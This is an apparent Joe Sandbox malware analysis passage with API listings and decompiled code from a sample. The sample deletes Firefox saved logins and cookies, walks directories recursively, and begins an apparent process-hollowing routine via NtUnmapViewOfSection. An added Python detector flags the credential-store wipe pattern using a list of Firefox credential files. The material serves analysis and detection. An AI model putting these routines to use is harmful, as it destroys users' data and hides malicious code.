                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407440
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407449
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407463
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407470
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040747C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407485
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040748E
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407497
                                  • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004074A4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 004074FD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00407506
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 0040750F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V?$basic_string@$D@1@@V10@$V01@@$??4?$basic_string@FileFindV01@$?c_str@?$basic_string@$CloseDeleteFirstNextV10@@getenv
                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                  • API String ID: 3375041920-3681987949
                                  • Opcode ID: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                  • Instruction ID: c62cee961eeb0feb44b1f04b02d1ffc3ba69f98c32627a35338bed2311f0f042
                                  • Opcode Fuzzy Hash: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                  • Instruction Fuzzy Hash: 69712E71C0460EEBCB009BE0DC59DEEBF78AF55355F004176E812E31A0EB74668ACB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 0040752D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040753A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 0040754C
                                  • getenv.MSVCRT ref: 00407558
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 00407564
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407570
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407579
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407582
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040759C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 004075A6
                                  • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 004075AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004075B9
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 004075C7
                                  • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 004075F0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\cookies.sqlite,?,?,?), ref: 0040768B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\cookies.sqlite,?,?,?), ref: 00407698
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076A4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076B6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076BF
                                  • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076C6
                                  • GetLastError.KERNEL32(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076D0
                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076EC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],00000000,?,?,?,?,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00407704
                                    • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                    • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407717
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407720
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@FindHstd@@V?$basic_string@$FileV01@@V10@$??4?$basic_string@?c_str@?$basic_string@CloseV01@$DeleteErrorFirstLastNextV10@@getenv
                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                  • API String ID: 2907366228-432212279
                                  • Opcode ID: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                  • Instruction ID: 2cb50fe65e7b882f74eabaaae12ed0bec9aebdba7c4873397d04c6de05a2bb48
                                  • Opcode Fuzzy Hash: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                  • Instruction Fuzzy Hash: 0C61A431C0460DEBCB00AFB4DC599EEBB78EF55355F004572E812E3290EB75668ACB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%
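
The two listings above (the functions at 004072A1 and 0040752D) have the same shape: read `UserProfile` with getenv, append `\AppData\Roaming\Mozilla\Firefox\Profiles\`, enumerate that directory with FindFirstFileA/FindNextFileA, then call DeleteFileA on `\logins.json` and `\key3.db` (first function) or `\cookies.sqlite` (second) and build the status strings `[Firefox StoredLogins Cleared!]` / `[Firefox cookies found, cleared!]`. Note that these listings show the stores being deleted, not read: no call here opens the files. The Python below is an added example, not part of the Joe Sandbox report or of the sample. It parses listing lines of this format into (API, module, args, ref) records and applies a rule that flags a function touching the Firefox profile directory and deleting one of the credential or cookie stores. The sample input is copied from the three listings in this section; the watchlist goes beyond the report to key4.db and signons.sqlite (the newer and older equivalents of key3.db and logins.json), which is an assumption about what an analyst would also want to catch.

```python
"""Added example: parse Joe Sandbox 'APIs' listing lines and flag the Firefox
credential-store wipe pattern (profile-directory enumeration followed by
DeleteFileA on logins.json / key3.db / cookies.sqlite). Not from the report."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# One listing line: optional bullet, optional "Part of subcall function XXXXXXXX:",
# <api>.<MODULE>, optional "(args)", then "ref: <addr>". Mangled C++ names carry
# '?', '@' and '$', so the API name is any non-blank run up to the first '.'.
_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\S+?)\.(?P<mod>[A-Z][A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Files whose deletion destroys saved Firefox logins or sessions. The report
# shows logins.json, key3.db and cookies.sqlite; key4.db and signons.sqlite are
# added as the newer and older equivalents (assumption, not from the report).
FIREFOX_CRED_FILES = {"logins.json", "key3.db", "key4.db", "signons.sqlite", "cookies.sqlite"}
FIREFOX_PROFILE_DIR = "\\mozilla\\firefox\\profiles\\"


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str]


@dataclass
class Finding:
    rule: str
    deleted: List[str]  # basenames of the stores the function deletes
    refs: List[str]     # addresses of the DeleteFile* calls


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Return the parsed call, or None for headings and other non-API lines."""
    m = _LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    # Naive comma split: a literal like "[Firefox cookies found, cleared!]"
    # splits in two, which is harmless for the path-shaped arguments used here.
    args = [a.strip() for a in raw.split(",")] if raw is not None else []
    return ApiCall(m.group("api"), m.group("mod"), args, m.group("ref").upper(), m.group("sub"))


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_firefox_wipe(calls: List[ApiCall]) -> Optional[Finding]:
    """Flag a function that builds the Firefox profile path and deletes a store inside it."""
    paths = [a for c in calls for a in c.args if a.startswith("\\")]
    touches_profile = any(FIREFOX_PROFILE_DIR in p.lower() for p in paths)
    deletes = [c for c in calls if c.api in ("DeleteFileA", "DeleteFileW")]
    targets = sorted({basename(p) for p in paths if basename(p) in FIREFOX_CRED_FILES})
    if touches_profile and deletes and targets:
        return Finding("firefox_credential_store_wipe", targets, [c.ref for c in deletes])
    return None


def scan_blocks(blocks: Dict[str, List[str]]) -> List[Tuple[str, Finding]]:
    """Parse each function's listing and collect the flagged functions."""
    out = []
    for name, lines in blocks.items():
        calls = [c for c in map(parse_api_line, lines) if c is not None]
        finding = detect_firefox_wipe(calls)
        if finding is not None:
            out.append((name, finding))
    return out


# Constructed sample input: lines copied from the three listings in this
# report (directory walk at 00410720, Firefox logins at 004072A1, Firefox
# cookies at 0040752D), trimmed to the calls that matter for the rule.
SAMPLE_BLOCKS = {
    "dir_walk_00410720": [
        "• FindFirstFileW.KERNEL32(00000000), ref: 004107EF",
        "• FindNextFileW.KERNEL32(?,?), ref: 0041087C",
    ],
    "firefox_logins_004072A1": [
        r"• ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 004072CD",
        "• getenv.MSVCRT ref: 004072D9",
        "• FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 0040732E",
        "• ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox StoredLogins not found],00000000), ref: 0040735C",
        "  • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1",
        r"• DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004074A4",
    ],
    "firefox_cookies_0040752D": [
        r"• ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 0040754C",
        "• FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 004075AD",
        r"• DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076C6",
        r"• ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],00000000,?,?,?,?,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00407704",
    ],
}

if __name__ == "__main__":
    for name, f in scan_blocks(SAMPLE_BLOCKS):
        print(f"{name}: {f.rule} deletes {', '.join(f.deleted)} at {', '.join(f.refs)}")
```

Run as a script it prints the two flagged functions; the directory-walk function at 00410720, which enumerates but never deletes, is not reported. To use it on a whole report, group the API lines per function (each "APIs" block) and pass the groups as the dictionary. The rule deliberately keys on the path string plus a DeleteFile* call rather than on the status strings, so a build that changes the `[Firefox ...]` messages is still caught.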

                                  C-Code - Quality: 16%
                                  			E00404C0A(intOrPtr* __ecx, char _a4, char _a20) {
                                  				char _v5;
                                  				void* _v12;
                                  				char _v13;
                                  				char _v14;
                                  				void* _v32;
                                  				char _v48;
                                  				short _v64;
                                  				char _v80;
                                  				char _v96;
                                  				void* _v112;
                                  				char _v128;
                                  				char _v144;
                                  				struct _WIN32_FIND_DATAW _v736;
                                  				char* _t73;
                                  				struct _WIN32_FIND_DATAW* _t75;
                                  				void* _t79;
                                  				void* _t81;
                                  				signed int _t96;
                                  				intOrPtr* _t137;
                                  				void* _t139;
                                  				void* _t141;
                                  				signed int _t145;
                                  
                                  				_t137 = __ecx;
                                  				_t60 =  &_v5;
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                  				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                  				__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                  				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                  				E0040504F( &_v5,  &_v5, _t60, __imp__tolower);
                                  				L00414146();
                                  				_t141 = _t139 + 0x1c;
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_a4, "*",  &_v736);
                                  				_v12 = FindFirstFileW( &_v64,  &_v64);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				if(_v12 == 0xffffffff) {
                                  					L11:
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					return 1;
                                  				}
                                  				while(FindNextFileW(_v12,  &_v736) != 0) {
                                  					if((_v736.dwFileAttributes & 0x00000010) != 0 && wcscmp( &(_v736.cFileName), ".") != 0 && wcscmp( &(_v736.cFileName), L"..") != 0) {
                                  						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v5, 0x5c);
                                  						L0041414C();
                                  						L00414152();
                                  						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                  						_t141 = _t141 + 0x18;
                                  						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                  						E00404C0A(_t137,  &_v64,  &_a20,  &_v64,  &_v144,  &_v144,  &_a4,  &(_v736.cFileName),  &(_v736.cFileName));
                                  						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					}
                                  					_t71 =  &(_v736.cFileName);
                                  					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &(_v736.cFileName),  &_v14);
                                  					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                  					__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                  					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                  					E0040504F( &(_v736.cFileName),  &(_v736.cFileName), _t71, __imp__tolower);
                                  					_t141 = _t141 + 0x10;
                                  					_t73 =  &_a20;
                                  					__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z(_t73, 0);
                                  					if(_t73 ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                  						L8:
                                  						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  						continue;
                                  					} else {
                                  						_t75 =  &_v736;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t75, 0x250,  &_v13);
                                  						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t75);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						_t145 = _t141 - 0x10;
                                  						_t96 = _t145;
                                  						_t79 = E00412855( &_v80,  &_v128,  &_a4);
                                  						_t80 =  &_v96;
                                  						L00414140();
                                  						L00414140();
                                  						_t81 = E00402440( &_v96, 0x66, _t96,  &_v96, _t80, _t79, 0x41b310);
                                  						_t141 = _t145 + 0x30;
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ( &_v48,  *_t137);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						if((_t96 & 0xffffff00 | _t81 == 0xffffffff) != 0) {
                                  							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  							return 0;
                                  						}
                                  						goto L8;
                                  					}
                                  				}
                                  				FindClose(_v12);
                                  				goto L11;
                                  			}


                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,76959F40), ref: 00404C1F
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,76959F40), ref: 00404C2F
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C39
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C43
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                  • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                  • wcscmp.MSVCRT ref: 00404CCA
                                  • wcscmp.MSVCRT ref: 00404CE2
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D5E
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E55
                                    • Part of subcall function 00404C0A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E5E
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E67
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E70
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404D72
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,?,?), ref: 00404D7C
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D86
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D90
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404DA8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404DCF
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404DD9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404DE2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404E0C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404E16
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E31
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E3A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E47
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404E7D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E86
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E8F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E98
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@std@@$D@2@@std@@$??0?$basic_string@$Hstd@@V?$basic_string@$?begin@?$basic_string@$FindG@2@@0@V01@@V10@0@$?end@?$basic_string@D@1@@D@2@@0@FileG@1@@V10@wcscmp$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@CloseFirstNextV01@V12@
                                  • String ID:
                                  • API String ID: 1504175218-0
                                  • Opcode ID: b4a4d34770c0ec194417ac69f6ada37e51486882ee5cbf665e722fa8e6873c4f
                                  • Instruction ID: e99c239ae8235e7f5c20d0f9326128258c52c2c7d0b7d23e31a82f6e10cc2207
                                  • Opcode Fuzzy Hash: b4a4d34770c0ec194417ac69f6ada37e51486882ee5cbf665e722fa8e6873c4f
                                  • Instruction Fuzzy Hash: 8A711E7280050EEBCB04EFA0EC899EE777CEF94345F548066F516A31A0EB745649CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E0040F219() {
                                  				void* _t59;
                                  				void* _t60;
                                  				void _t71;
                                  				void* _t72;
                                  				signed int _t74;
                                  				CONTEXT* _t80;
                                  				intOrPtr _t85;
                                  				intOrPtr* _t93;
                                  				signed int _t95;
                                  				void* _t100;
                                  				CONTEXT* _t110;
                                  				struct _PROCESS_INFORMATION* _t114;
                                  				void* _t115;
                                  				void* _t117;
                                  
                                  				L00413ECA();
                                  				 *((intOrPtr*)(_t115 - 0x10)) = _t117 - 0x70;
                                  				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
                                  				 *((intOrPtr*)(_t115 - 0x78)) = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
                                  				_t59 =  *(_t115 + 0xc);
                                  				 *(_t115 - 0x74) = _t59;
                                  				if( *_t59 != 0x5a4d) {
                                  					L16:
                                  					 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
                                  					_t60 = 0;
                                  				} else {
